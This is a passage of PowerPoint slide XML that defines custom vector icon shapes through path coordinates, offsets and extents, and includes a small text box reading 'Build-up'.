                    <a:pt x="1791432" y="2076334"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="969005" y="2030800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973688" y="2076334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="997942" y="2219324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135534" y="2169774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176026" y="2151638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061678" y="2089068"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2270995" y="1682607"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2193789" y="1749541"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2157450" y="1779622"/>
                    <a:pt x="2119670" y="1809519"/>
                    <a:pt x="2080535" y="1839120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1988274" y="1905861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956628" y="2160317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929983" y="2282840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032699" y="2311732"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2281801" y="2367725"/>
                    <a:pt x="2467430" y="2349840"/>
                    <a:pt x="2530541" y="2244806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2601541" y="2126643"/>
                    <a:pt x="2502356" y="1923350"/>
                    <a:pt x="2289139" y="1700285"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="491768" y="1666932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="473585" y="1684439"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="256508" y="1903749"/>
                    <a:pt x="153790" y="2105280"/>
                    <a:pt x="222717" y="2224664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283985" y="2330784"/>
                    <a:pt x="469273" y="2351906"/>
                    <a:pt x="719315" y="2300269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="831176" y="2270901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808495" y="2160317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776012" y="1899134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679735" y="1826895"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="616990" y="1777691"/>
                    <a:pt x="557836" y="1727770"/>
                    <a:pt x="502637" y="1677612"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2001099" y="1443878"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2005588" y="1555029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000712" y="1675767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038461" y="1648469"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2070345" y="1623579"/>
                    <a:pt x="2101053" y="1598643"/>
                    <a:pt x="2130505" y="1573751"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2143759" y="1562074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039991" y="1473050"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="764411" y="1434288"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726661" y="1461587"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="694778" y="1486477"/>
                    <a:pt x="664070" y="1511412"/>
                    <a:pt x="634617" y="1536305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="621360" y="1547985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725129" y="1637009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764024" y="1666183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759534" y="1555029"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1386966" y="1049980"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1160689" y="1170734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947211" y="1303680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938816" y="1555028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947046" y="1801432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154015" y="1935392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378151" y="2060078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604433" y="1939321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817909" y="1806377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826304" y="1555028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818074" y="1308628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611105" y="1174667"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1767179" y="890733"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1629589" y="940281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589093" y="958419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703444" y="1020991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796116" y="1079257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791432" y="1033723"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1001168" y="880921"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973688" y="1033723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969233" y="1077033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071048" y="1015472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186470" y="954907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146299" y="936065"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2296662" y="783036"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2224233" y="781291"/>
                    <a:pt x="2139574" y="790423"/>
                    <a:pt x="2045808" y="809787"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1933945" y="839155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956628" y="949742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989111" y="1210925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085387" y="1283163"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2148132" y="1332368"/>
                    <a:pt x="2207286" y="1382289"/>
                    <a:pt x="2262485" y="1432446"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2273353" y="1443125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2291537" y="1425616"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2508615" y="1206306"/>
                    <a:pt x="2611333" y="1004776"/>
                    <a:pt x="2542406" y="885391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2504113" y="819067"/>
                    <a:pt x="2417375" y="785944"/>
                    <a:pt x="2296662" y="783036"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482072" y="767202"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361326" y="768003"/>
                    <a:pt x="274023" y="799606"/>
                    <a:pt x="234579" y="865253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163579" y="983417"/>
                    <a:pt x="262764" y="1186709"/>
                    <a:pt x="475981" y="1409774"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="494126" y="1427453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571333" y="1360517"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="607672" y="1330436"/>
                    <a:pt x="645452" y="1300540"/>
                    <a:pt x="684587" y="1270938"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="776848" y="1204197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808495" y="949742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835139" y="827220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732420" y="798327"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="639007" y="777329"/>
                    <a:pt x="554520" y="766721"/>
                    <a:pt x="482072" y="767202"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1382560" y="215755"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1244707" y="215755"/>
                    <a:pt x="1121535" y="405476"/>
                    <a:pt x="1040146" y="703126"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1038397" y="710184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159394" y="751212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1388689" y="852872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1619722" y="755229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1729016" y="720284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724974" y="703126"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1643585" y="405476"/>
                    <a:pt x="1520414" y="215755"/>
                    <a:pt x="1382560" y="215755"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1382561" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1576111" y="0"/>
                    <a:pt x="1749046" y="220285"/>
                    <a:pt x="1863319" y="565886"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1892754" y="669221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1998805" y="644109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2355240" y="570272"/>
                    <a:pt x="2632481" y="609896"/>
                    <a:pt x="2729256" y="777515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2826030" y="945133"/>
                    <a:pt x="2721726" y="1205043"/>
                    <a:pt x="2479563" y="1476806"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2396868" y="1564493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415853" y="1583149"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2697403" y="1884053"/>
                    <a:pt x="2823474" y="2176199"/>
                    <a:pt x="2715481" y="2355928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2615796" y="2521833"/>
                    <a:pt x="2337906" y="2556612"/>
                    <a:pt x="1982813" y="2476565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1890625" y="2453030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863319" y="2544172"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1749047" y="2889773"/>
                    <a:pt x="1576111" y="3110058"/>
                    <a:pt x="1382561" y="3110058"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1189012" y="3110058"/>
                    <a:pt x="1016076" y="2889773"/>
                    <a:pt x="901803" y="2544172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="872368" y="2440837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766317" y="2465949"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="409882" y="2539787"/>
                    <a:pt x="132641" y="2500163"/>
                    <a:pt x="35866" y="2332544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-60908" y="2164925"/>
                    <a:pt x="43396" y="1905015"/>
                    <a:pt x="285559" y="1633252"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="368254" y="1545565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349269" y="1526910"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="67719" y="1226005"/>
                    <a:pt x="-58351" y="933860"/>
                    <a:pt x="49641" y="754130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149326" y="588226"/>
                    <a:pt x="427216" y="553446"/>
                    <a:pt x="782309" y="633493"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="874497" y="657029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901803" y="565886"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1016076" y="220285"/>
                    <a:pt x="1189012" y="0"/>
                    <a:pt x="13825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9C9A370C-239C-46DD-B40B-9E055DB25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6004" y="3682990"/>
              <a:ext cx="320490" cy="269438"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3985089" h="3350285">
                  <a:moveTo>
                    <a:pt x="1489879" y="1687056"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1413602" y="1687056"/>
                    <a:pt x="1351768" y="1748890"/>
                    <a:pt x="1351768" y="1825167"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1351768" y="1828965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1351768" y="1905242"/>
                    <a:pt x="1413602" y="1967076"/>
                    <a:pt x="1489879" y="1967076"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1717713" y="1967076"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1793990" y="1967076"/>
                    <a:pt x="1855824" y="1905242"/>
                    <a:pt x="1855824" y="1828965"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1855824" y="1825167"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1855824" y="1748890"/>
                    <a:pt x="1793990" y="1687056"/>
                    <a:pt x="1717713" y="1687056"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2281462" y="1675141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2205185" y="1675141"/>
                    <a:pt x="2143351" y="1736975"/>
                    <a:pt x="2143351" y="1813252"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2143351" y="1817050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2143351" y="1893327"/>
                    <a:pt x="2205185" y="1955161"/>
                    <a:pt x="2281462" y="1955161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2509296" y="1955161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2585573" y="1955161"/>
                    <a:pt x="2647407" y="1893327"/>
                    <a:pt x="2647407" y="1817050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2647407" y="1813252"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2647407" y="1736975"/>
                    <a:pt x="2585573" y="1675141"/>
                    <a:pt x="2509296" y="1675141"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2837535" y="1159396"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2731595" y="1159396"/>
                    <a:pt x="2645713" y="1245278"/>
                    <a:pt x="2645713" y="1351218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645713" y="1457158"/>
                    <a:pt x="2731595" y="1543040"/>
                    <a:pt x="2837535" y="1543040"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2943475" y="1543040"/>
                    <a:pt x="3029357" y="1457158"/>
                    <a:pt x="3029357" y="1351218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3029357" y="1245278"/>
                    <a:pt x="2943475" y="1159396"/>
                    <a:pt x="2837535" y="1159396"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3235655" y="750352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3129715" y="750352"/>
                    <a:pt x="3043833" y="836234"/>
                    <a:pt x="3043833" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3043833" y="1048114"/>
                    <a:pt x="3129715" y="1133996"/>
                    <a:pt x="3235655" y="1133996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3341595" y="1133996"/>
                    <a:pt x="3427477" y="1048114"/>
                    <a:pt x="3427477" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3427477" y="836234"/>
                    <a:pt x="3341595" y="750352"/>
                    <a:pt x="3235655" y="750352"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2455585" y="750352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2349645" y="750352"/>
                    <a:pt x="2263763" y="836234"/>
                    <a:pt x="2263763" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2263763" y="1048114"/>
                    <a:pt x="2349645" y="1133996"/>
                    <a:pt x="2455585" y="1133996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2561525" y="1133996"/>
                    <a:pt x="2647407" y="1048114"/>
                    <a:pt x="2647407" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2647407" y="836234"/>
                    <a:pt x="2561525" y="750352"/>
                    <a:pt x="2455585" y="750352"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="941776" y="640989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="640989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421825" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421825" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="1361069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="1361069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701745" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701745" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="881020"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1061785" y="459017"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="762440" y="459017"/>
                    <a:pt x="519773" y="701684"/>
                    <a:pt x="519773" y="1001029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519773" y="1300374"/>
                    <a:pt x="762440" y="1543041"/>
                    <a:pt x="1061785" y="1543041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1361130" y="1543041"/>
                    <a:pt x="1603797" y="1300374"/>
                    <a:pt x="1603797" y="1001029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1603797" y="701684"/>
                    <a:pt x="1361130" y="459017"/>
                    <a:pt x="1061785" y="459017"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2837535" y="359296"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2731595" y="359296"/>
                    <a:pt x="2645713" y="445178"/>
                    <a:pt x="2645713" y="551118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645713" y="657058"/>
                    <a:pt x="2731595" y="742940"/>
                    <a:pt x="2837535" y="742940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2943475" y="742940"/>
                    <a:pt x="3029357" y="657058"/>
                    <a:pt x="3029357" y="551118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3029357" y="445178"/>
                    <a:pt x="2943475" y="359296"/>
                    <a:pt x="2837535" y="359296"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="927799" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2978398" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3447374" y="0"/>
                    <a:pt x="3902811" y="418280"/>
                    <a:pt x="3926614" y="887256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4011721" y="1784310"/>
                    <a:pt x="4065643" y="3326870"/>
                    <a:pt x="3630620" y="3349891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3101375" y="3362701"/>
                    <a:pt x="2778421" y="2566209"/>
                    <a:pt x="2352321" y="2174369"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1572952" y="2174369"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1161652" y="2566210"/>
                    <a:pt x="901104" y="3370635"/>
                    <a:pt x="339051" y="3349892"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-171518" y="3349299"/>
                    <a:pt x="45251" y="1463012"/>
                    <a:pt x="48163" y="849156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48163" y="380180"/>
                    <a:pt x="458823" y="0"/>
                    <a:pt x="927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">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87D4543-E180-4DF6-A62E-340B16086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95" y="3961380"/>
              <a:ext cx="348693" cy="269437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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E01154-688D-4F5A-ACE4-7E1F6AF2E45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6822" y="3332187"/>
              <a:ext cx="299221" cy="322665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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083C078B-CB36-4448-B100-8BECDC326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6432" y="2099615"/>
              <a:ext cx="296548" cy="296548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8508A6-2707-40ED-98D7-03C1932691B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08791" y="4297323"/>
              <a:ext cx="336694" cy="323742"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3948393" h="3817544">
                  <a:moveTo>
                    <a:pt x="1888045" y="2370407"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1180379" y="2998560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695350" y="2712314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703301" y="3014463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1888044" y="3817544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1885393" y="3356368"/>
                    <a:pt x="1874793" y="2911096"/>
                    <a:pt x="1888045" y="2370407"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2059390" y="2370407"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2072642" y="2911096"/>
                    <a:pt x="2062042" y="3356368"/>
                    <a:pt x="2059391" y="3817544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3244134" y="3014463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3252085" y="2712314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2767056" y="2998560"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="733907" y="1451867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2113471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170450" y="2848461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1919327" y="2170968"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3206900" y="1451867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2021479" y="2170968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770356" y="2848461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3940806" y="2113471"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1195981" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10560" y="719101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759438" y="1396594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929887" y="661605"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2762973" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2029067" y="661605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3199516" y="1396594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948393" y="719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9ED16-E476-4E17-A34C-B1B46D12815D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8705632" y="4148811"/>
            <a:ext cx="164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Build-up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275C19-BA54-4650-B131-3F27D4E65004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8045579" y="2409380"/>
            <a:ext cx="2811142" cy="2844985"/>
            <a:chOff x="8045579" y="2409380"/>
            <a:chExt cx="2811142" cy="2844985"/>
          </a:xfrm>
        </p:grpSpPr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D5FFF734-6862-424E-A388-EF245D0D57E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10509374" y="3444941"/>
              <a:ext cx="343339" cy="343339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39952090-A2AE-4DA8-A3DA-62986F260D10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8174482" y="417483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C9A03E33-5D13-4BFE-9600-571F01E84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5535" y="2409380"/>
              <a:ext cx="393582" cy="392828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Trapezoid 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD1CF70-6406-4C32-BF96-0C20604B317A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10073915" y="2714730"/>
              <a:ext cx="351357" cy="423598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Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5905C8AA-7159-4608-899A-6C22426D61BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="3600000">
              <a:off x="8507130" y="4424299"/>
              <a:ext cx="162074" cy="478539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1327763" h="3920353">
                  <a:moveTo>
                    <a:pt x="483881" y="2840232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="843881" y="2840232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843881" y="3920353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483881" y="3920353"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="757697" y="168239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="757697" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930062" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930062" y="168239"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="432932" y="168239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="432932" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605297" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
